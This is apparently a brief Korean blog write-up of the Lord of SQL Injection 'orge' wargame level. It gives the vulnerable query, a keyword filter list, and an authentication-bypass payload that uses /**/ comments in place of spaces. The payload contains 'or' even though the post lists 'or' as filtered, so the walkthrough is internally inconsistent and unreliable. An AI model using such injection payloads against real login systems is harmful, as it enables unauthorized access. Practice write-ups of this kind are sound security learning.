[LOS] orge

Posted Mar 26, 2025 Updated Mar 26, 2025

By 1unaram

1 min read

Query

  
select id from prob_orge where id='guest' and pw='{$_GET[pw]}'

Protection

preg_match

prob 문자열
_
.
()
or
and

Analysis

공백 문자 대신 주석 /**/을 사용할 수 있다.

Payload

?pw='or/**/id='admin'/**/%23

Wargame, Lord of SQL Injection

webhacking sqli

This post is licensed under CC BY 4.0 by the author.

Recently Updated

Trending Tags

webhacking webhacking.kr sqli portswigger assembly pwnable wargame dreamhack os quiz

Contents

Trending Tags

webhacking webhacking.kr sqli portswigger assembly pwnable wargame dreamhack os quiz

A new version of content is available.